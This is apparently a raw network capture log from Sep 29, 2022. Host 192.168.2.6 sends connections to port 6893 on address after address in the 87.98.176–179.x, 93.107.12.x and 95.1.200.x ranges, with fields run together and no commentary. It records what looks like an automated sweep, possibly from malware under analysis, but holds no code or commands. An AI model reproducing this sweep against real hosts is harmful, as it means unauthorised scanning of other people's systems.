                                                                                                                                                                                      Sep 29, 2022 14:50:26.792272091 CEST590836893192.168.2.687.98.178.38
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792393923 CEST590836893192.168.2.687.98.178.41
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792419910 CEST590836893192.168.2.687.98.178.42
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792525053 CEST590836893192.168.2.687.98.178.43
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792613029 CEST590836893192.168.2.687.98.178.44
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792712927 CEST590836893192.168.2.687.98.178.45
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792805910 CEST590836893192.168.2.687.98.178.46
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792886019 CEST590836893192.168.2.687.98.178.47
                                                                                                                                                                                      Sep 29, 2022 14:50:26.792959929 CEST590836893192.168.2.687.98.178.48
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793112040 CEST590836893192.168.2.687.98.178.49
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793231010 CEST590836893192.168.2.687.98.178.50
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793318987 CEST590836893192.168.2.687.98.178.51
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793426991 CEST590836893192.168.2.687.98.178.52
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793549061 CEST590836893192.168.2.687.98.178.53
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793642044 CEST590836893192.168.2.687.98.178.54
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793798923 CEST590836893192.168.2.687.98.178.55
                                                                                                                                                                                      Sep 29, 2022 14:50:26.793869019 CEST590836893192.168.2.687.98.178.56
                                                                                                                                                                                      Sep 29, 2022 14:50:26.794048071 CEST590836893192.168.2.687.98.178.57
                                                                                                                                                                                      Sep 29, 2022 14:50:26.794126987 CEST590836893192.168.2.687.98.178.58
                                                                                                                                                                                      Sep 29, 2022 14:50:26.794234991 CEST590836893192.168.2.687.98.178.59
                                                                                                                                                                                      Sep 29, 2022 14:50:26.795865059 CEST590836893192.168.2.687.98.178.60
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796170950 CEST590836893192.168.2.687.98.178.61
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796240091 CEST590836893192.168.2.687.98.178.62
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796318054 CEST590836893192.168.2.687.98.178.63
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796423912 CEST590836893192.168.2.687.98.178.64
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796546936 CEST590836893192.168.2.687.98.178.65
                                                                                                                                                                                      Sep 29, 2022 14:50:26.796721935 CEST590836893192.168.2.687.98.178.66
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797451973 CEST590836893192.168.2.687.98.178.67
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797564030 CEST590836893192.168.2.687.98.178.68
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797665119 CEST590836893192.168.2.687.98.178.69
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797920942 CEST590836893192.168.2.687.98.178.71
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797976017 CEST590836893192.168.2.687.98.178.70
                                                                                                                                                                                      Sep 29, 2022 14:50:26.797995090 CEST590836893192.168.2.687.98.178.72
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798213959 CEST590836893192.168.2.687.98.178.74
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798258066 CEST590836893192.168.2.687.98.178.73
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798305035 CEST590836893192.168.2.687.98.178.75
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798541069 CEST590836893192.168.2.687.98.178.77
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798626900 CEST590836893192.168.2.687.98.178.78
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798728943 CEST590836893192.168.2.687.98.178.79
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798805952 CEST590836893192.168.2.687.98.178.80
                                                                                                                                                                                      Sep 29, 2022 14:50:26.798912048 CEST590836893192.168.2.687.98.178.81
                                                                                                                                                                                      Sep 29, 2022 14:50:26.799015045 CEST590836893192.168.2.687.98.178.76
                                                                                                                                                                                      Sep 29, 2022 14:50:26.799015045 CEST590836893192.168.2.687.98.178.82
                                                                                                                                                                                      Sep 29, 2022 14:50:26.799141884 CEST590836893192.168.2.687.98.178.83
                                                                                                                                                                                      Sep 29, 2022 14:50:26.799269915 CEST590836893192.168.2.687.98.178.84
                                                                                                                                                                                      Sep 29, 2022 14:50:26.799376965 CEST590836893192.168.2.687.98.178.85
                                                                                                                                                                                      Sep 29, 2022 14:50:26.837197065 CEST590836893192.168.2.687.98.178.230
                                                                                                                                                                                      Sep 29, 2022 14:50:26.837291956 CEST590836893192.168.2.687.98.178.231
                                                                                                                                                                                      Sep 29, 2022 14:50:26.837383032 CEST590836893192.168.2.687.98.178.232
                                                                                                                                                                                      Sep 29, 2022 14:50:26.837470055 CEST590836893192.168.2.687.98.178.233
                                                                                                                                                                                      Sep 29, 2022 14:50:26.839855909 CEST590836893192.168.2.687.98.178.234
                                                                                                                                                                                      Sep 29, 2022 14:50:26.839971066 CEST590836893192.168.2.687.98.178.235
                                                                                                                                                                                      Sep 29, 2022 14:50:26.840203047 CEST590836893192.168.2.687.98.178.236
                                                                                                                                                                                      Sep 29, 2022 14:50:26.840396881 CEST590836893192.168.2.687.98.178.237
                                                                                                                                                                                      Sep 29, 2022 14:50:26.840547085 CEST590836893192.168.2.687.98.178.238
                                                                                                                                                                                      Sep 29, 2022 14:50:26.840632915 CEST590836893192.168.2.687.98.178.239
                                                                                                                                                                                      Sep 29, 2022 14:50:26.841602087 CEST590836893192.168.2.687.98.178.240
                                                                                                                                                                                      Sep 29, 2022 14:50:26.841614962 CEST590836893192.168.2.687.98.178.241
                                                                                                                                                                                      Sep 29, 2022 14:50:26.841763020 CEST590836893192.168.2.687.98.178.242
                                                                                                                                                                                      Sep 29, 2022 14:50:26.841871023 CEST590836893192.168.2.687.98.178.243
                                                                                                                                                                                      Sep 29, 2022 14:50:26.841999054 CEST590836893192.168.2.687.98.178.244
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842094898 CEST590836893192.168.2.687.98.178.245
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842195988 CEST590836893192.168.2.687.98.178.246
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842273951 CEST590836893192.168.2.687.98.178.247
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842377901 CEST590836893192.168.2.687.98.178.248
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842478037 CEST590836893192.168.2.687.98.178.249
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842597961 CEST590836893192.168.2.687.98.178.250
                                                                                                                                                                                      Sep 29, 2022 14:50:26.842773914 CEST590836893192.168.2.687.98.178.251
                                                                                                                                                                                      Sep 29, 2022 14:50:26.843383074 CEST590836893192.168.2.687.98.178.252
                                                                                                                                                                                      Sep 29, 2022 14:50:26.843991041 CEST590836893192.168.2.687.98.178.253
                                                                                                                                                                                      Sep 29, 2022 14:50:26.844106913 CEST590836893192.168.2.687.98.178.254
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878115892 CEST590836893192.168.2.687.98.178.255
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878222942 CEST590836893192.168.2.687.98.179.0
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878326893 CEST590836893192.168.2.687.98.179.1
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878441095 CEST590836893192.168.2.687.98.179.2
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878511906 CEST590836893192.168.2.687.98.179.3
                                                                                                                                                                                      Sep 29, 2022 14:50:27.878619909 CEST590836893192.168.2.687.98.179.4
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881094933 CEST590836893192.168.2.687.98.179.5
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881347895 CEST590836893192.168.2.687.98.179.6
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881505966 CEST590836893192.168.2.687.98.179.7
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881715059 CEST590836893192.168.2.687.98.179.8
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881812096 CEST590836893192.168.2.687.98.179.9
                                                                                                                                                                                      Sep 29, 2022 14:50:27.881911993 CEST590836893192.168.2.687.98.179.10
                                                                                                                                                                                      Sep 29, 2022 14:50:27.896725893 CEST590836893192.168.2.687.98.179.11
                                                                                                                                                                                      Sep 29, 2022 14:50:27.896884918 CEST590836893192.168.2.687.98.179.12
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897001982 CEST590836893192.168.2.687.98.179.13
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897180080 CEST590836893192.168.2.687.98.179.14
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897254944 CEST590836893192.168.2.687.98.179.15
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897509098 CEST590836893192.168.2.687.98.179.16
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897759914 CEST590836893192.168.2.687.98.179.17
                                                                                                                                                                                      Sep 29, 2022 14:50:27.897846937 CEST590836893192.168.2.687.98.179.18
                                                                                                                                                                                      Sep 29, 2022 14:50:27.898020983 CEST590836893192.168.2.687.98.179.19
                                                                                                                                                                                      Sep 29, 2022 14:50:27.899324894 CEST590836893192.168.2.687.98.179.20
                                                                                                                                                                                      Sep 29, 2022 14:50:27.899506092 CEST590836893192.168.2.687.98.179.21
                                                                                                                                                                                      Sep 29, 2022 14:50:27.899663925 CEST590836893192.168.2.687.98.179.22
                                                                                                                                                                                      Sep 29, 2022 14:50:27.899821043 CEST590836893192.168.2.687.98.179.23
                                                                                                                                                                                      Sep 29, 2022 14:50:27.899923086 CEST590836893192.168.2.687.98.179.24
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900051117 CEST590836893192.168.2.687.98.179.25
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900187969 CEST590836893192.168.2.687.98.179.26
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900357962 CEST590836893192.168.2.687.98.179.27
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900501013 CEST590836893192.168.2.687.98.179.28
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900651932 CEST590836893192.168.2.687.98.179.29
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900886059 CEST590836893192.168.2.687.98.179.31
                                                                                                                                                                                      Sep 29, 2022 14:50:27.900918961 CEST590836893192.168.2.687.98.179.30
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901026011 CEST590836893192.168.2.687.98.179.32
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901158094 CEST590836893192.168.2.687.98.179.33
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901345968 CEST590836893192.168.2.687.98.179.34
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901468992 CEST590836893192.168.2.687.98.179.35
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901602030 CEST590836893192.168.2.687.98.179.36
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901721001 CEST590836893192.168.2.687.98.179.37
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901859045 CEST590836893192.168.2.687.98.179.38
                                                                                                                                                                                      Sep 29, 2022 14:50:27.901978016 CEST590836893192.168.2.687.98.179.39
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902087927 CEST590836893192.168.2.687.98.179.40
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902266979 CEST590836893192.168.2.687.98.179.41
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902383089 CEST590836893192.168.2.687.98.179.42
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902513981 CEST590836893192.168.2.687.98.179.43
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902642965 CEST590836893192.168.2.687.98.179.44
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902762890 CEST590836893192.168.2.687.98.179.45
                                                                                                                                                                                      Sep 29, 2022 14:50:27.902878046 CEST590836893192.168.2.687.98.179.46
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903048992 CEST590836893192.168.2.687.98.179.47
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903115988 CEST590836893192.168.2.687.98.179.48
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903275013 CEST590836893192.168.2.687.98.179.49
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903393030 CEST590836893192.168.2.687.98.179.50
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903575897 CEST590836893192.168.2.687.98.179.51
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903718948 CEST590836893192.168.2.687.98.179.52
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903851032 CEST590836893192.168.2.687.98.179.53
                                                                                                                                                                                      Sep 29, 2022 14:50:27.903964996 CEST590836893192.168.2.687.98.179.54
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904088020 CEST590836893192.168.2.687.98.179.55
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904222965 CEST590836893192.168.2.687.98.179.56
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904392958 CEST590836893192.168.2.687.98.179.57
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904598951 CEST590836893192.168.2.687.98.179.58
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904723883 CEST590836893192.168.2.687.98.179.59
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904865026 CEST590836893192.168.2.687.98.179.60
                                                                                                                                                                                      Sep 29, 2022 14:50:27.904982090 CEST590836893192.168.2.687.98.179.61
                                                                                                                                                                                      Sep 29, 2022 14:50:27.905148983 CEST590836893192.168.2.687.98.179.62
                                                                                                                                                                                      Sep 29, 2022 14:50:27.905292988 CEST590836893192.168.2.687.98.179.63
                                                                                                                                                                                      Sep 29, 2022 14:50:27.905473948 CEST590836893192.168.2.687.98.179.64
                                                                                                                                                                                      Sep 29, 2022 14:50:27.916073084 CEST590836893192.168.2.687.98.179.65
                                                                                                                                                                                      Sep 29, 2022 14:50:27.916400909 CEST590836893192.168.2.687.98.179.66
                                                                                                                                                                                      Sep 29, 2022 14:50:27.916625977 CEST590836893192.168.2.687.98.179.67
                                                                                                                                                                                      Sep 29, 2022 14:50:27.916802883 CEST590836893192.168.2.687.98.179.68
                                                                                                                                                                                      Sep 29, 2022 14:50:27.916927099 CEST590836893192.168.2.687.98.179.69
                                                                                                                                                                                      Sep 29, 2022 14:50:27.917066097 CEST590836893192.168.2.687.98.179.70
                                                                                                                                                                                      Sep 29, 2022 14:50:27.917258024 CEST590836893192.168.2.687.98.179.71
                                                                                                                                                                                      Sep 29, 2022 14:50:27.918625116 CEST590836893192.168.2.687.98.179.72
                                                                                                                                                                                      Sep 29, 2022 14:50:27.918767929 CEST590836893192.168.2.687.98.179.73
                                                                                                                                                                                      Sep 29, 2022 14:50:27.918901920 CEST590836893192.168.2.687.98.179.74
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919066906 CEST590836893192.168.2.687.98.179.75
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919195890 CEST590836893192.168.2.687.98.179.76
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919348001 CEST590836893192.168.2.687.98.179.77
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919461966 CEST590836893192.168.2.687.98.179.78
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919558048 CEST590836893192.168.2.687.98.179.79
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919755936 CEST590836893192.168.2.687.98.179.80
                                                                                                                                                                                      Sep 29, 2022 14:50:27.919910908 CEST590836893192.168.2.687.98.179.81
                                                                                                                                                                                      Sep 29, 2022 14:50:27.920023918 CEST590836893192.168.2.687.98.179.82
                                                                                                                                                                                      Sep 29, 2022 14:50:27.920170069 CEST590836893192.168.2.687.98.179.83
                                                                                                                                                                                      Sep 29, 2022 14:50:27.920347929 CEST590836893192.168.2.687.98.179.84
                                                                                                                                                                                      Sep 29, 2022 14:50:27.920463085 CEST590836893192.168.2.687.98.179.85
                                                                                                                                                                                      Sep 29, 2022 14:50:28.001869917 CEST590836893192.168.2.687.98.179.230
                                                                                                                                                                                      Sep 29, 2022 14:50:28.001992941 CEST590836893192.168.2.687.98.179.231
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002135992 CEST590836893192.168.2.687.98.179.232
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002255917 CEST590836893192.168.2.687.98.179.233
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002351999 CEST590836893192.168.2.687.98.179.234
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002546072 CEST590836893192.168.2.687.98.179.235
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002619028 CEST590836893192.168.2.687.98.179.236
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002737999 CEST590836893192.168.2.687.98.179.237
                                                                                                                                                                                      Sep 29, 2022 14:50:28.002840996 CEST590836893192.168.2.687.98.179.238
                                                                                                                                                                                      Sep 29, 2022 14:50:28.003021002 CEST590836893192.168.2.687.98.179.239
                                                                                                                                                                                      Sep 29, 2022 14:50:28.003124952 CEST590836893192.168.2.687.98.179.240
                                                                                                                                                                                      Sep 29, 2022 14:50:28.004859924 CEST590836893192.168.2.687.98.179.241
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005045891 CEST590836893192.168.2.687.98.179.242
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005175114 CEST590836893192.168.2.687.98.179.243
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005248070 CEST590836893192.168.2.687.98.179.244
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005369902 CEST590836893192.168.2.687.98.179.245
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005484104 CEST590836893192.168.2.687.98.179.246
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005563974 CEST590836893192.168.2.687.98.179.247
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005641937 CEST590836893192.168.2.687.98.179.248
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005737066 CEST590836893192.168.2.687.98.179.249
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005806923 CEST590836893192.168.2.687.98.179.250
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005881071 CEST590836893192.168.2.687.98.179.251
                                                                                                                                                                                      Sep 29, 2022 14:50:28.005964994 CEST590836893192.168.2.687.98.179.252
                                                                                                                                                                                      Sep 29, 2022 14:50:28.006089926 CEST590836893192.168.2.687.98.179.253
                                                                                                                                                                                      Sep 29, 2022 14:50:28.007112026 CEST590836893192.168.2.687.98.179.254
                                                                                                                                                                                      Sep 29, 2022 14:50:29.057388067 CEST590836893192.168.2.687.98.179.255
                                                                                                                                                                                      Sep 29, 2022 14:50:33.439837933 CEST590846893192.168.2.693.107.12.0
                                                                                                                                                                                      Sep 29, 2022 14:50:33.439920902 CEST590846893192.168.2.693.107.12.2
                                                                                                                                                                                      Sep 29, 2022 14:50:33.439918995 CEST590846893192.168.2.693.107.12.1
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440087080 CEST590846893192.168.2.693.107.12.3
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440145016 CEST590846893192.168.2.693.107.12.4
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440242052 CEST590846893192.168.2.693.107.12.5
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440287113 CEST590846893192.168.2.693.107.12.6
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440367937 CEST590846893192.168.2.693.107.12.7
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440432072 CEST590846893192.168.2.693.107.12.8
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440498114 CEST590846893192.168.2.693.107.12.9
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440583944 CEST590846893192.168.2.693.107.12.10
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440639973 CEST590846893192.168.2.693.107.12.11
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440723896 CEST590846893192.168.2.693.107.12.12
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440787077 CEST590846893192.168.2.693.107.12.13
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440866947 CEST590846893192.168.2.693.107.12.14
                                                                                                                                                                                      Sep 29, 2022 14:50:33.440948009 CEST590846893192.168.2.693.107.12.15
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441005945 CEST590846893192.168.2.693.107.12.16
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441070080 CEST590846893192.168.2.693.107.12.17
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441143990 CEST590846893192.168.2.693.107.12.18
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441301107 CEST590846893192.168.2.693.107.12.20
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441354036 CEST590846893192.168.2.693.107.12.21
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441379070 CEST590846893192.168.2.693.107.12.19
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441433907 CEST590846893192.168.2.693.107.12.22
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441503048 CEST590846893192.168.2.693.107.12.23
                                                                                                                                                                                      Sep 29, 2022 14:50:33.441596985 CEST590846893192.168.2.693.107.12.24
                                                                                                                                                                                      Sep 29, 2022 14:50:33.444206953 CEST590846893192.168.2.693.107.12.25
                                                                                                                                                                                      Sep 29, 2022 14:50:33.444319010 CEST590846893192.168.2.693.107.12.26
                                                                                                                                                                                      Sep 29, 2022 14:50:33.444407940 CEST590846893192.168.2.693.107.12.27
                                                                                                                                                                                      Sep 29, 2022 14:50:33.444505930 CEST590846893192.168.2.693.107.12.28
                                                                                                                                                                                      Sep 29, 2022 14:50:33.444552898 CEST590846893192.168.2.693.107.12.29
                                                                                                                                                                                      Sep 29, 2022 14:50:33.445668936 CEST590846893192.168.2.693.107.12.30
                                                                                                                                                                                      Sep 29, 2022 14:50:33.445868015 CEST590846893192.168.2.693.107.12.31
                                                                                                                                                                                      Sep 29, 2022 14:50:33.446104050 CEST590846893192.168.2.695.1.200.0
                                                                                                                                                                                      Sep 29, 2022 14:50:33.446194887 CEST590846893192.168.2.695.1.200.1
                                                                                                                                                                                      Sep 29, 2022 14:50:33.453953028 CEST590846893192.168.2.695.1.200.2
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454045057 CEST590846893192.168.2.695.1.200.3
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454128027 CEST590846893192.168.2.695.1.200.4
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454246044 CEST590846893192.168.2.695.1.200.5
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454364061 CEST590846893192.168.2.695.1.200.6
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454447031 CEST590846893192.168.2.695.1.200.7
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454502106 CEST590846893192.168.2.695.1.200.8
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454637051 CEST590846893192.168.2.695.1.200.9
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454672098 CEST590846893192.168.2.695.1.200.10
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454783916 CEST590846893192.168.2.695.1.200.11
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454910040 CEST590846893192.168.2.695.1.200.12
                                                                                                                                                                                      Sep 29, 2022 14:50:33.454987049 CEST590846893192.168.2.695.1.200.13
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455069065 CEST590846893192.168.2.695.1.200.14
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455127954 CEST590846893192.168.2.695.1.200.15
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455210924 CEST590846893192.168.2.695.1.200.16
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455398083 CEST590846893192.168.2.695.1.200.17
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455488920 CEST590846893192.168.2.695.1.200.18
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455565929 CEST590846893192.168.2.695.1.200.19
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455637932 CEST590846893192.168.2.695.1.200.20
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455847025 CEST590846893192.168.2.695.1.200.22
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455961943 CEST590846893192.168.2.695.1.200.21
                                                                                                                                                                                      Sep 29, 2022 14:50:33.455970049 CEST590846893192.168.2.695.1.200.23
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456100941 CEST590846893192.168.2.695.1.200.25
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456171989 CEST590846893192.168.2.695.1.200.26
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456263065 CEST590846893192.168.2.695.1.200.27
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456342936 CEST590846893192.168.2.695.1.200.28
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456410885 CEST590846893192.168.2.695.1.200.29
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456474066 CEST590846893192.168.2.695.1.200.30
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456552029 CEST590846893192.168.2.695.1.200.31
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456559896 CEST590846893192.168.2.695.1.200.24
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456741095 CEST590846893192.168.2.687.98.176.0
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456835985 CEST590846893192.168.2.687.98.176.1
                                                                                                                                                                                      Sep 29, 2022 14:50:33.456931114 CEST590846893192.168.2.687.98.176.2
                                                                                                                                                                                      Sep 29, 2022 14:50:33.457015991 CEST590846893192.168.2.687.98.176.3
                                                                                                                                                                                      Sep 29, 2022 14:50:33.457078934 CEST590846893192.168.2.687.98.176.4
                                                                                                                                                                                      Sep 29, 2022 14:50:33.457194090 CEST590846893192.168.2.687.98.176.5
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458551884 CEST590846893192.168.2.687.98.176.6
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458661079 CEST590846893192.168.2.687.98.176.7
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458715916 CEST590846893192.168.2.687.98.176.8
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458792925 CEST590846893192.168.2.687.98.176.9
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458906889 CEST590846893192.168.2.687.98.176.10
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458920956 CEST590846893192.168.2.687.98.176.11
                                                                                                                                                                                      Sep 29, 2022 14:50:33.458980083 CEST590846893192.168.2.687.98.176.12
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459057093 CEST590846893192.168.2.687.98.176.13
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459172010 CEST590846893192.168.2.687.98.176.14
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459256887 CEST590846893192.168.2.687.98.176.15
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459301949 CEST590846893192.168.2.687.98.176.16
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459386110 CEST590846893192.168.2.687.98.176.17
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459449053 CEST590846893192.168.2.687.98.176.18
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459547043 CEST590846893192.168.2.687.98.176.19
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459644079 CEST590846893192.168.2.687.98.176.20
                                                                                                                                                                                      Sep 29, 2022 14:50:33.459703922 CEST590846893192.168.2.687.98.176.21
                                                                                                                                                                                      Sep 29, 2022 14:50:33.575548887 CEST590846893192.168.2.687.98.176.166
                                                                                                                                                                                      Sep 29, 2022 14:50:33.575644970 CEST590846893192.168.2.687.98.176.167
                                                                                                                                                                                      Sep 29, 2022 14:50:33.575715065 CEST590846893192.168.2.687.98.176.168
                                                                                                                                                                                      Sep 29, 2022 14:50:33.575838089 CEST590846893192.168.2.687.98.176.169
                                                                                                                                                                                      Sep 29, 2022 14:50:33.575916052 CEST590846893192.168.2.687.98.176.170
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576025963 CEST590846893192.168.2.687.98.176.171
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576118946 CEST590846893192.168.2.687.98.176.172
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576201916 CEST590846893192.168.2.687.98.176.173
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576407909 CEST590846893192.168.2.687.98.176.174
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576524019 CEST590846893192.168.2.687.98.176.175
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576658010 CEST590846893192.168.2.687.98.176.176
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576723099 CEST590846893192.168.2.687.98.176.177
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576858044 CEST590846893192.168.2.687.98.176.178
                                                                                                                                                                                      Sep 29, 2022 14:50:33.576947927 CEST590846893192.168.2.687.98.176.179
                                                                                                                                                                                      Sep 29, 2022 14:50:33.577076912 CEST590846893192.168.2.687.98.176.180
                                                                                                                                                                                      Sep 29, 2022 14:50:33.577174902 CEST590846893192.168.2.687.98.176.181
                                                                                                                                                                                      Sep 29, 2022 14:50:33.577233076 CEST590846893192.168.2.687.98.176.182
                                                                                                                                                                                      Sep 29, 2022 14:50:33.577353001 CEST590846893192.168.2.687.98.176.183
